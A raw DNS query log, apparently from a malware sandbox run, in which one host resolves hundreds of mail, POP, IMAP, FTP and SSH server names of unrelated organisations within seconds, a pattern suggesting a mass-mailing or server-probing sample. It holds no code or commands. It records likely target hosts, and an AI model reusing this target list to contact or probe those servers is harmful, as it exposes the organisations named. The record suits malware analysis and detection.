Dec 22, 2023 21:14:59.018338919 CET	192.168.2.4	1.1.1.1	0xd96	Standard query (0)	mail.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.018599033 CET	192.168.2.4	1.1.1.1	0x990a	Standard query (0)	imap.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.018690109 CET	192.168.2.4	1.1.1.1	0x740c	Standard query (0)	pop.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.020543098 CET	192.168.2.4	1.1.1.1	0x85c4	Standard query (0)	pop.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.113955021 CET	192.168.2.4	1.1.1.1	0x19a4	Standard query (0)	mail.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.356431007 CET	192.168.2.4	1.1.1.1	0xbc0d	Standard query (0)	mail.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.357351065 CET	192.168.2.4	1.1.1.1	0xe5b6	Standard query (0)	pop.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.357517004 CET	192.168.2.4	1.1.1.1	0xd0e1	Standard query (0)	pop.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.360167027 CET	192.168.2.4	1.1.1.1	0x499d	Standard query (0)	mail.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.360501051 CET	192.168.2.4	1.1.1.1	0x2886	Standard query (0)	pop.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.362766027 CET	192.168.2.4	1.1.1.1	0x9d97	Standard query (0)	pop.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.416307926 CET	192.168.2.4	1.1.1.1	0xed6d	Standard query (0)	pop.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.417068005 CET	192.168.2.4	1.1.1.1	0x7f9d	Standard query (0)	mail.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.417450905 CET	192.168.2.4	1.1.1.1	0xcd4b	Standard query (0)	mail.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.424145937 CET	192.168.2.4	1.1.1.1	0x9061	Standard query (0)	ftp.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.424304962 CET	192.168.2.4	1.1.1.1	0xea1	Standard query (0)	ftp.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.424442053 CET	192.168.2.4	1.1.1.1	0x261f	Standard query (0)	ftp.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.424673080 CET	192.168.2.4	1.1.1.1	0xcd0b	Standard query (0)	ftp.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.425797939 CET	192.168.2.4	1.1.1.1	0xd315	Standard query (0)	imap.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.426598072 CET	192.168.2.4	1.1.1.1	0x1683	Standard query (0)	pop.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.426598072 CET	192.168.2.4	1.1.1.1	0x8757	Standard query (0)	pop3.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.479607105 CET	192.168.2.4	1.1.1.1	0xf93c	Standard query (0)	mail.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.481415987 CET	192.168.2.4	1.1.1.1	0x9e8f	Standard query (0)	ssh.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.490948915 CET	192.168.2.4	1.1.1.1	0x510f	Standard query (0)	pop.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.492782116 CET	192.168.2.4	1.1.1.1	0xeed0	Standard query (0)	mailgate.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.502729893 CET	192.168.2.4	1.1.1.1	0xa553	Standard query (0)	pop.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.547013998 CET	192.168.2.4	1.1.1.1	0x9d97	Standard query (0)	pop.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.547087908 CET	192.168.2.4	1.1.1.1	0x499d	Standard query (0)	mail.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.578721046 CET	192.168.2.4	1.1.1.1	0xcfa0	Standard query (0)	pop.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.608578920 CET	192.168.2.4	1.1.1.1	0xed6d	Standard query (0)	pop.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.608664989 CET	192.168.2.4	1.1.1.1	0x8757	Standard query (0)	pop3.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.608678102 CET	192.168.2.4	1.1.1.1	0x1683	Standard query (0)	pop.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.609270096 CET	192.168.2.4	1.1.1.1	0x535f	Standard query (0)	pop.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.610896111 CET	192.168.2.4	1.1.1.1	0xa402	Standard query (0)	pop.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.611125946 CET	192.168.2.4	1.1.1.1	0x1025	Standard query (0)	mail.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.623635054 CET	192.168.2.4	1.1.1.1	0x6fef	Standard query (0)	williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.624131918 CET	192.168.2.4	1.1.1.1	0x3fa4	Standard query (0)	mx2-us1.ppe-hosted.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.756555080 CET	192.168.2.4	1.1.1.1	0xea12	Standard query (0)	souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.815426111 CET	192.168.2.4	1.1.1.1	0x6fef	Standard query (0)	williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.847768068 CET	192.168.2.4	1.1.1.1	0xb874	Standard query (0)	ssh.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.849361897 CET	192.168.2.4	1.1.1.1	0x9e35	Standard query (0)	263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.854007959 CET	192.168.2.4	1.1.1.1	0xe8e2	Standard query (0)	bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.855743885 CET	192.168.2.4	1.1.1.1	0x3d82	Standard query (0)	dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.856086016 CET	192.168.2.4	1.1.1.1	0xedc5	Standard query (0)	acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.856605053 CET	192.168.2.4	1.1.1.1	0x69a1	Standard query (0)	91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.856935024 CET	192.168.2.4	1.1.1.1	0xe14a	Standard query (0)	rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.860742092 CET	192.168.2.4	1.1.1.1	0x1d1f	Standard query (0)	enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.861083984 CET	192.168.2.4	1.1.1.1	0x3d23	Standard query (0)	mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.861494064 CET	192.168.2.4	1.1.1.1	0xe92c	Standard query (0)	rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.862771034 CET	192.168.2.4	1.1.1.1	0xcee7	Standard query (0)	jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.872939110 CET	192.168.2.4	1.1.1.1	0x7e12	Standard query (0)	studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.872939110 CET	192.168.2.4	1.1.1.1	0xf3b2	Standard query (0)	bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.873296022 CET	192.168.2.4	1.1.1.1	0x9bfa	Standard query (0)	aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.873625040 CET	192.168.2.4	1.1.1.1	0xc538	Standard query (0)	djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.873920918 CET	192.168.2.4	1.1.1.1	0xc33d	Standard query (0)	chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.874088049 CET	192.168.2.4	1.1.1.1	0xa771	Standard query (0)	select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.874438047 CET	192.168.2.4	1.1.1.1	0xbd8	Standard query (0)	hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.874730110 CET	192.168.2.4	1.1.1.1	0x21c7	Standard query (0)	nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.874979973 CET	192.168.2.4	1.1.1.1	0xfc7	Standard query (0)	djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.875143051 CET	192.168.2.4	1.1.1.1	0x4158	Standard query (0)	taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.877233982 CET	192.168.2.4	1.1.1.1	0x9022	Standard query (0)	mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.879112005 CET	192.168.2.4	1.1.1.1	0xc76a	Standard query (0)	vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.879300117 CET	192.168.2.4	1.1.1.1	0xdc20	Standard query (0)	hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.891525030 CET	192.168.2.4	1.1.1.1	0xcd63	Standard query (0)	mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.892227888 CET	192.168.2.4	1.1.1.1	0xb38f	Standard query (0)	pop.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.905469894 CET	192.168.2.4	1.1.1.1	0x303f	Standard query (0)	piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.905829906 CET	192.168.2.4	1.1.1.1	0x6768	Standard query (0)	hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.905993938 CET	192.168.2.4	1.1.1.1	0xea12	Standard query (0)	souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.906302929 CET	192.168.2.4	1.1.1.1	0x88d4	Standard query (0)	pop3.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.906478882 CET	192.168.2.4	1.1.1.1	0x1198	Standard query (0)	ssh.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.909039974 CET	192.168.2.4	1.1.1.1	0x40b0	Standard query (0)	pop.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.910537004 CET	192.168.2.4	1.1.1.1	0xf108	Standard query (0)	pop3.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.910821915 CET	192.168.2.4	1.1.1.1	0xf0b6	Standard query (0)	ssh.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.911746025 CET	192.168.2.4	1.1.1.1	0x3a7c	Standard query (0)	mail.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.917382002 CET	192.168.2.4	1.1.1.1	0x2ec1	Standard query (0)	ssh.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.917649984 CET	192.168.2.4	1.1.1.1	0xfcff	Standard query (0)	ssh.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.918699026 CET	192.168.2.4	1.1.1.1	0x49b5	Standard query (0)	mail.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.919037104 CET	192.168.2.4	1.1.1.1	0x867b	Standard query (0)	ssh.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.933032990 CET	192.168.2.4	1.1.1.1	0xb818	Standard query (0)	ssh.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.955197096 CET	192.168.2.4	1.1.1.1	0x5a17	Standard query (0)	arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.972974062 CET	192.168.2.4	1.1.1.1	0x9d64	Standard query (0)	mail.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.972974062 CET	192.168.2.4	1.1.1.1	0x8448	Standard query (0)	mail.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.984606028 CET	192.168.2.4	1.1.1.1	0xcd6	Standard query (0)	pop.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.984841108 CET	192.168.2.4	1.1.1.1	0x4b60	Standard query (0)	pop.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.985106945 CET	192.168.2.4	1.1.1.1	0x79cc	Standard query (0)	pop.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.987163067 CET	192.168.2.4	1.1.1.1	0x8403	Standard query (0)	pop.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046485901 CET	192.168.2.4	1.1.1.1	0xcee7	Standard query (0)	jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046736002 CET	192.168.2.4	1.1.1.1	0x3d23	Standard query (0)	mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046736002 CET	192.168.2.4	1.1.1.1	0x69a1	Standard query (0)	91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046781063 CET	192.168.2.4	1.1.1.1	0xdc20	Standard query (0)	hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046781063 CET	192.168.2.4	1.1.1.1	0x1d1f	Standard query (0)	enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046825886 CET	192.168.2.4	1.1.1.1	0x21c7	Standard query (0)	nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046869040 CET	192.168.2.4	1.1.1.1	0x4158	Standard query (0)	taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046869040 CET	192.168.2.4	1.1.1.1	0xc76a	Standard query (0)	vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046869040 CET	192.168.2.4	1.1.1.1	0x9022	Standard query (0)	mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046895981 CET	192.168.2.4	1.1.1.1	0xb38f	Standard query (0)	pop.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046895981 CET	192.168.2.4	1.1.1.1	0xa771	Standard query (0)	select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.046927929 CET	192.168.2.4	1.1.1.1	0xcd63	Standard query (0)	mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.048145056 CET	192.168.2.4	1.1.1.1	0x4942	Standard query (0)	rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.061556101 CET	192.168.2.4	1.1.1.1	0x110c	Standard query (0)	pop.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.113811970 CET	192.168.2.4	1.1.1.1	0xa773	Standard query (0)	pop.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.113811970 CET	192.168.2.4	1.1.1.1	0xf108	Standard query (0)	pop3.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.113853931 CET	192.168.2.4	1.1.1.1	0x1198	Standard query (0)	ssh.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.113862991 CET	192.168.2.4	1.1.1.1	0x867b	Standard query (0)	ssh.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.114036083 CET	192.168.2.4	1.1.1.1	0x49b5	Standard query (0)	mail.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.114036083 CET	192.168.2.4	1.1.1.1	0xfcff	Standard query (0)	ssh.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.114089012 CET	192.168.2.4	1.1.1.1	0x5a17	Standard query (0)	arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.128443003 CET	192.168.2.4	1.1.1.1	0xdd04	Standard query (0)	pop.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.128581047 CET	192.168.2.4	1.1.1.1	0x9d64	Standard query (0)	mail.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.128989935 CET	192.168.2.4	1.1.1.1	0xa68c	Standard query (0)	pop3.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.159244061 CET	192.168.2.4	1.1.1.1	0x434b	Standard query (0)	pop.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.162823915 CET	192.168.2.4	1.1.1.1	0xb23b	Standard query (0)	pop.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.162823915 CET	192.168.2.4	1.1.1.1	0x2376	Standard query (0)	pop.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.188091993 CET	192.168.2.4	1.1.1.1	0x2231	Standard query (0)	pop.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.202475071 CET	192.168.2.4	1.1.1.1	0x4942	Standard query (0)	rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.217991114 CET	192.168.2.4	1.1.1.1	0x238	Standard query (0)	pop.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.218224049 CET	192.168.2.4	1.1.1.1	0x592	Standard query (0)	pop.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.218658924 CET	192.168.2.4	1.1.1.1	0x74bb	Standard query (0)	pop.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.219070911 CET	192.168.2.4	1.1.1.1	0xabf4	Standard query (0)	pop.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.310609102 CET	192.168.2.4	1.1.1.1	0x2376	Standard query (0)	pop.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.314344883 CET	192.168.2.4	1.1.1.1	0xe305	Standard query (0)	smtp.secureserver.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.334847927 CET	192.168.2.4	1.1.1.1	0x2953	Standard query (0)	mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.336850882 CET	192.168.2.4	1.1.1.1	0x2231	Standard query (0)	pop.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.339577913 CET	192.168.2.4	1.1.1.1	0x54e	Standard query (0)	imap.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.340265989 CET	192.168.2.4	1.1.1.1	0x9045	Standard query (0)	pop.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.342571020 CET	192.168.2.4	1.1.1.1	0xf35e	Standard query (0)	caribbean360-com.p20.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.406497002 CET	192.168.2.4	1.1.1.1	0xabf4	Standard query (0)	pop.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.406497955 CET	192.168.2.4	1.1.1.1	0x238	Standard query (0)	pop.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.468297005 CET	192.168.2.4	1.1.1.1	0x6308	Standard query (0)	derrickandbriggs-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.475564003 CET	192.168.2.4	1.1.1.1	0xab89	Standard query (0)	pop.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.483614922 CET	192.168.2.4	1.1.1.1	0x5958	Standard query (0)	pop.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.484117985 CET	192.168.2.4	1.1.1.1	0x494b	Standard query (0)	pop.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.484117985 CET	192.168.2.4	1.1.1.1	0x41d0	Standard query (0)	pop.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.501497984 CET	192.168.2.4	1.1.1.1	0xf35e	Standard query (0)	caribbean360-com.p20.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.501560926 CET	192.168.2.4	1.1.1.1	0x2953	Standard query (0)	mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.501560926 CET	192.168.2.4	1.1.1.1	0x54e	Standard query (0)	imap.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.504882097 CET	192.168.2.4	1.1.1.1	0x5c9d	Standard query (0)	imap.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.510767937 CET	192.168.2.4	1.1.1.1	0xa490	Standard query (0)	e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.514728069 CET	192.168.2.4	1.1.1.1	0xc4a8	Standard query (0)	pop.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.543515921 CET	192.168.2.4	1.1.1.1	0xc19a	Standard query (0)	ssh.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.544584036 CET	192.168.2.4	1.1.1.1	0x8c74	Standard query (0)	pop.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.544863939 CET	192.168.2.4	1.1.1.1	0xb0d5	Standard query (0)	ssh.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.548432112 CET	192.168.2.4	1.1.1.1	0x421a	Standard query (0)	pop.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.552925110 CET	192.168.2.4	1.1.1.1	0x216c	Standard query (0)	ismaworld-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.581717968 CET	192.168.2.4	1.1.1.1	0xd708	Standard query (0)	pop.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.583640099 CET	192.168.2.4	1.1.1.1	0x8e93	Standard query (0)	pop3.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.583980083 CET	192.168.2.4	1.1.1.1	0x17d1	Standard query (0)	mailgate.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.583980083 CET	192.168.2.4	1.1.1.1	0x8eda	Standard query (0)	pop.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.594784975 CET	192.168.2.4	1.1.1.1	0x2962	Standard query (0)	viruswall.tvs-e.in	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.613439083 CET	192.168.2.4	1.1.1.1	0x426b	Standard query (0)	pop3.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.614248991 CET	192.168.2.4	1.1.1.1	0x5f62	Standard query (0)	pop.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.691478968 CET	192.168.2.4	1.1.1.1	0x6308	Standard query (0)	derrickandbriggs-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.691524029 CET	192.168.2.4	1.1.1.1	0x494b	Standard query (0)	pop.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.691548109 CET	192.168.2.4	1.1.1.1	0x5c9d	Standard query (0)	imap.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.697510958 CET	192.168.2.4	1.1.1.1	0x216c	Standard query (0)	ismaworld-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.700627089 CET	192.168.2.4	1.1.1.1	0x421a	Standard query (0)	pop.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.700829983 CET	192.168.2.4	1.1.1.1	0xc19a	Standard query (0)	ssh.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.700855017 CET	192.168.2.4	1.1.1.1	0xb0d5	Standard query (0)	ssh.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.762244940 CET	192.168.2.4	1.1.1.1	0x8eda	Standard query (0)	pop.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.810301065 CET	192.168.2.4	1.1.1.1	0x5a4b	Standard query (0)	ssh.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.888559103 CET	192.168.2.4	1.1.1.1	0x412b	Standard query (0)	irelandventures-com01i.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.090617895 CET	192.168.2.4	1.1.1.1	0x412b	Standard query (0)	irelandventures-com01i.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.102799892 CET	192.168.2.4	1.1.1.1	0x867b	Standard query (0)	ssh.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.102799892 CET	192.168.2.4	1.1.1.1	0x49b5	Standard query (0)	mail.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.103178024 CET	192.168.2.4	1.1.1.1	0x4e4f	Standard query (0)	9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.111217976 CET	192.168.2.4	1.1.1.1	0xf8c9	Standard query (0)	hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.111218929 CET	192.168.2.4	1.1.1.1	0x6e1	Standard query (0)	ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.153594971 CET	192.168.2.4	1.1.1.1	0x57b1	Standard query (0)	viruswall.tvs-e.in	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.187439919 CET	192.168.2.4	1.1.1.1	0x2160	Standard query (0)	mail.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.188288927 CET	192.168.2.4	1.1.1.1	0x8ff8	Standard query (0)	pop.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.200670004 CET	192.168.2.4	1.1.1.1	0x5c1f	Standard query (0)	aspmx3.googlemail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.202110052 CET	192.168.2.4	1.1.1.1	0xe255	Standard query (0)	mail.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.203041077 CET	192.168.2.4	1.1.1.1	0x58ee	Standard query (0)	ssh.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.203041077 CET	192.168.2.4	1.1.1.1	0x5039	Standard query (0)	saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.203555107 CET	192.168.2.4	1.1.1.1	0xa8ef	Standard query (0)	ssh.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.203879118 CET	192.168.2.4	1.1.1.1	0x9721	Standard query (0)	earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.209697962 CET	192.168.2.4	1.1.1.1	0xe8f3	Standard query (0)	mailgate.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.212415934 CET	192.168.2.4	1.1.1.1	0x21fe	Standard query (0)	smartiebritches-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.243249893 CET	192.168.2.4	1.1.1.1	0x254b	Standard query (0)	gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.244474888 CET	192.168.2.4	1.1.1.1	0xa768	Standard query (0)	daystarbookscharity.com	A (IP address)	IN (0x0001)	false
